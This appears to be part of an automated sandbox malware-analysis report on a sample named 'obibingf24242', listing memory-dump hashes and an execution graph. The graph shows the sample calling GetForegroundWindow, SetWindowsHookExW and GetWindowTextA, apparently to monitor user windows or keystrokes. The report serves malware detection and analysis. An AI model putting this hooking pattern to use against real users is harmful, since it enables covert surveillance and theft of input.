                                                              • Instruction ID: 1a2d80be148b02e1b401ead92d6ea3083cdc81613f5aa31682b165826e49a153
                                                              • Opcode Fuzzy Hash: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
                                                              • Instruction Fuzzy Hash: B3218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498B2A7C33A984ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.423851016.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction ID: 52c815ef28cb02b911deba5281035f990efd29d8bf1dbe06e3189aef2660295c
                                                              • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction Fuzzy Hash: 2C11BB75504284DFDB01CF14D5C4B15BFB1FF84314F28C6A9D8494B256C33AD84ACBA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: p=
                                                              • API String ID: 0-1995268981
                                                              • Opcode ID: 218c467ae8c420b01248eb91fd0f8fa128f12336cb69e2884938f89e83a3452d
                                                              • Instruction ID: 788ca5f53f55dbfe6fb6e26ab95c0112aece8012f4c3deaffa79b0ebe8f7791d
                                                              • Opcode Fuzzy Hash: 218c467ae8c420b01248eb91fd0f8fa128f12336cb69e2884938f89e83a3452d
                                                              • Instruction Fuzzy Hash: 8EE10C74E141598FDB14DFA9C580AADFBF2FF89305F248169D814A735ACB30AA41CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa4f63d8227d5ea8d1225d321cbbd1b215dd656f9431b3a674111f8f88b1fe1e
                                                              • Instruction ID: 3e16d94e348537de49a739030beb3165ed9439946417d555f0bd84b3bb100ea9
                                                              • Opcode Fuzzy Hash: fa4f63d8227d5ea8d1225d321cbbd1b215dd656f9431b3a674111f8f88b1fe1e
                                                              • Instruction Fuzzy Hash: F0E12A74E142598FDB14DFA8C5809ADFBF2BF89305F2481A9D818AB35AC730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8bd7e370a7652bb3bbd96df12a347985d7806bc11f0ae3310cdd99e7482c9e12
                                                              • Instruction ID: c90a83ce1c3e8d0d900bd9261ea92330273ac1cd0958ed04d4a9d4b3fc164434
                                                              • Opcode Fuzzy Hash: 8bd7e370a7652bb3bbd96df12a347985d7806bc11f0ae3310cdd99e7482c9e12
                                                              • Instruction Fuzzy Hash: F7E10974E102598FDB14DFA9C5809ADFBF2BF89305F248169D815AB35ADB30AE41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d09dbfd3dbbbce899a86bc40dc073335552bc20e32292b71476688f759c1762a
                                                              • Instruction ID: d42aeec30a5e5117e0c305d4a5eaa5366fb9644f441b7ba97078b520aa59005c
                                                              • Opcode Fuzzy Hash: d09dbfd3dbbbce899a86bc40dc073335552bc20e32292b71476688f759c1762a
                                                              • Instruction Fuzzy Hash: 69E10B74E142598FDB14DFA9C5809ADFBF2BF89305F248169D419A735AC730AE41CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec45437a21e1c552fcfe8636e92b6aaf57756187d1851a06d12ddf39ea667348
                                                              • Instruction ID: dec51dc48087a7a3be228fdc53e2e800ad9cbebcd41b3820669e1412bbca3841
                                                              • Opcode Fuzzy Hash: ec45437a21e1c552fcfe8636e92b6aaf57756187d1851a06d12ddf39ea667348
                                                              • Instruction Fuzzy Hash: EBE11A74E142598FDB14DFA9C5809AEFBF2BF89305F248169D819A735AC730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 912708d0430e5144684338e6a9fa7a4b3d1efa0555d38ba9ac526f9d66193233
                                                              • Instruction ID: 99dff26d5466d38d465f1098e31b43cfc3c922c3e8d0482c8eff7ccf98a9c8da
                                                              • Opcode Fuzzy Hash: 912708d0430e5144684338e6a9fa7a4b3d1efa0555d38ba9ac526f9d66193233
                                                              • Instruction Fuzzy Hash: 3E91F070C15228DFDB24CFAAC8447ECBBF2BF99305F2480AAE419A7251DB754A95DF10
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.424279818.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_210000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df5572a18b1ab048a6ddb5aea5cdb40569497f8e6187a4481d94bf0457101839
                                                              • Instruction ID: e5b4f62af812ee4465b56332dec3a4e2ec4b2f3b566590822705c797a87f06cf
                                                              • Opcode Fuzzy Hash: df5572a18b1ab048a6ddb5aea5cdb40569497f8e6187a4481d94bf0457101839
                                                              • Instruction Fuzzy Hash: 638125B1D25219DFDB14CFAAD4446EDBBF6BF69300F20802AE409A7251DB744A96DF80

                                                              Execution Graph

                                                              Execution Coverage:20.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:9
                                                              Total number of Limit Nodes:0
                                                              execution_graph 5849 1c8a88 5850 1c8ac7 GetForegroundWindow 5849->5850 5851 1c8af3 5850->5851 5852 1c13a8 5853 1c13ec SetWindowsHookExW 5852->5853 5855 1c1432 5853->5855 5856 1c8b20 5858 1c8b76 GetWindowTextA 5856->5858 5859 1c8c7b 5858->5859

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 96 1c8b14-1c8b84 98 1c8b86-1c8bab 96->98 99 1c8bf3-1c8bf7 96->99 105 1c8bad-1c8baf 98->105 106 1c8bdb-1c8be0 98->106 100 1c8bf9-1c8c37 99->100 101 1c8c3b-1c8c79 GetWindowTextA 99->101 100->101 103 1c8c7b-1c8c81 101->103 104 1c8c82-1c8c90 101->104 103->104 107 1c8ca6-1c8ccd 104->107 108 1c8c92-1c8c9e 104->108 111 1c8bd1-1c8bd9 105->111 112 1c8bb1-1c8bbb 105->112 120 1c8be2-1c8bee 106->120 114 1c8cdd 107->114 115 1c8ccf-1c8cd3 107->115 108->107 111->120 117 1c8bbd 112->117 118 1c8bbf-1c8bcd 112->118 126 1c8cde 114->126 115->114 122 1c8cd5-1c8cd8 call 1c0218 115->122 117->118 118->118 123 1c8bcf 118->123 120->99 122->114 123->111 126->126
                                                              APIs
                                                              • GetWindowTextA.USER32(?,00000000,?), ref: 001C8C69
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936842178.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_1c0000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID:
                                                              • API String ID: 530164218-0
                                                              • Opcode ID: ea324f169dfc2138085679709b1a09fbb4890faa235a74d65abaed4c23322254
                                                              • Instruction ID: 36ae757e321952928dc70b545fe414274783cb6c2187a2b62c08ac244a0453d3
                                                              • Opcode Fuzzy Hash: ea324f169dfc2138085679709b1a09fbb4890faa235a74d65abaed4c23322254
                                                              • Instruction Fuzzy Hash: 48512670D002589FDB14CFA9C895BEEFBB1BF58300F14816EE416AB395DB74A844CB55

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 128 1c8b20-1c8b84 130 1c8b86-1c8bab 128->130 131 1c8bf3-1c8bf7 128->131 137 1c8bad-1c8baf 130->137 138 1c8bdb-1c8be0 130->138 132 1c8bf9-1c8c37 131->132 133 1c8c3b-1c8c79 GetWindowTextA 131->133 132->133 135 1c8c7b-1c8c81 133->135 136 1c8c82-1c8c90 133->136 135->136 139 1c8ca6-1c8ccd 136->139 140 1c8c92-1c8c9e 136->140 143 1c8bd1-1c8bd9 137->143 144 1c8bb1-1c8bbb 137->144 152 1c8be2-1c8bee 138->152 146 1c8cdd 139->146 147 1c8ccf-1c8cd3 139->147 140->139 143->152 149 1c8bbd 144->149 150 1c8bbf-1c8bcd 144->150 158 1c8cde 146->158 147->146 154 1c8cd5-1c8cd8 call 1c0218 147->154 149->150 150->150 155 1c8bcf 150->155 152->131 154->146 155->143 158->158
                                                              APIs
                                                              • GetWindowTextA.USER32(?,00000000,?), ref: 001C8C69
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936842178.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_1c0000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID:
                                                              • API String ID: 530164218-0
                                                              • Opcode ID: 7f3c30f428bcddc5a5481cf6affd298cdf637afc6ba57fd07e187cb42868d692
                                                              • Instruction ID: 88861e417222e69375fd430d5074e24c8380552ce8710baf2cf1b2fdf8cffd8d
                                                              • Opcode Fuzzy Hash: 7f3c30f428bcddc5a5481cf6affd298cdf637afc6ba57fd07e187cb42868d692
                                                              • Instruction Fuzzy Hash: 03510670D002589FDB14DFA9C895BEEBBB1BF58300F14812EE415AB395DB74A844CB95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 160 1c13a1-1c13f2 162 1c13fe-1c1430 SetWindowsHookExW 160->162 163 1c13f4 160->163 164 1c1439-1c145e 162->164 165 1c1432-1c1438 162->165 166 1c13fc 163->166 165->164 166->162
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 001C1423
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936842178.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_1c0000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: d9229fc88911a01f399cd8b58943abcb7e67207984fff4e1d24a6c91b5821c9d
                                                              • Instruction ID: 33a84c01486f6e0bc12c67452e1011c5e7d28268c30180b205557fcbe52c2e1c
                                                              • Opcode Fuzzy Hash: d9229fc88911a01f399cd8b58943abcb7e67207984fff4e1d24a6c91b5821c9d
                                                              • Instruction Fuzzy Hash: EE213775D002499FCB14DFA9D884BEEBBF5EB98310F10841AE419A7250C774AA44CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 170 1c13a8-1c13f2 172 1c13fe-1c1430 SetWindowsHookExW 170->172 173 1c13f4 170->173 174 1c1439-1c145e 172->174 175 1c1432-1c1438 172->175 176 1c13fc 173->176 175->174 176->172
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 001C1423
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936842178.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_1c0000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 07c6f71cf2fa18a2564fdde262b6e07224ab8b27233d37a97e5c5d6b4ee78e6e
                                                              • Instruction ID: 772e9b3a562d88302a2bfaf1882b0f7925f9228ee0c8b6dd3b09a51034bf97c1
                                                              • Opcode Fuzzy Hash: 07c6f71cf2fa18a2564fdde262b6e07224ab8b27233d37a97e5c5d6b4ee78e6e
                                                              • Instruction Fuzzy Hash: 13211575D002099FCB14DF9AD888BEEFBF5FB99310F10842AE415A7250C774AA44CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 180 1c8a88-1c8af1 GetForegroundWindow 182 1c8afa-1c8b0e 180->182 183 1c8af3-1c8af9 180->183 183->182
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 001C8AE4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936842178.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_1c0000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID: ForegroundWindow
                                                              • String ID:
                                                              • API String ID: 2020703349-0
                                                              • Opcode ID: 7013f355919a2ffae84108140d7963c3d6763f287f85284fd457f8deaa9df41c
                                                              • Instruction ID: 8d5714559478ed77836b71a4ef1d303e83753123256ceac74a94a840fb7b8314
                                                              • Opcode Fuzzy Hash: 7013f355919a2ffae84108140d7963c3d6763f287f85284fd457f8deaa9df41c
                                                              • Instruction Fuzzy Hash: 6011F0B59002098FDB10DF9AD588BDEFBF4EB48324F20881AD419B7350D778AA44CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936760007.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 070b3599dcf64d0e88ab84f2b9f56c0d1cf7d4eb1b4bf0cbbe92c1de60a8860c
                                                              • Instruction ID: 6faa6670d1953a4b7612d0cb12d759288a3cd94400cc6b81c5fbf325bac6eb42
                                                              • Opcode Fuzzy Hash: 070b3599dcf64d0e88ab84f2b9f56c0d1cf7d4eb1b4bf0cbbe92c1de60a8860c
                                                              • Instruction Fuzzy Hash: 1121B0B5604248AFEB04DF14E9C4B26BB75FF84314F34C5A9E84D4B242C33AD846CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936760007.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a8a2b2882317ce659cf3d2c866e02a417c5b3f705a47ced3fcb798e9a4ee695
                                                              • Instruction ID: e988f31349a1fbae1085efd351f3983c1e02e891f5dc7afb978f1c4c751da483
                                                              • Opcode Fuzzy Hash: 6a8a2b2882317ce659cf3d2c866e02a417c5b3f705a47ced3fcb798e9a4ee695
                                                              • Instruction Fuzzy Hash: 9421D475604248DFEB05DF14E9C4B26BBB5EF84324F74C569D80D4B286C33AD856CB61
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936760007.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction ID: 6d4567e2c7418b479e2ee297baaa7d9e16fccdad63e214b81069781396e444b6
                                                              • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction Fuzzy Hash: 5F118B75504284DFDB05CF14E9C4B15BBB1EF84314F28CAA9D8494B656C33AD85ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.936760007.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_17d000_obibingf24242.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction ID: 0dc52d923b763d6d190e98c994333edbbe2f39acc05e8eb20bfd6f058fa93c8d
                                                              • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                              • Instruction Fuzzy Hash: 4111A9B5504284CFDB01CF14E5C4B15BBB1FB84318F28C6AAD8494B252C33AD84ACBA2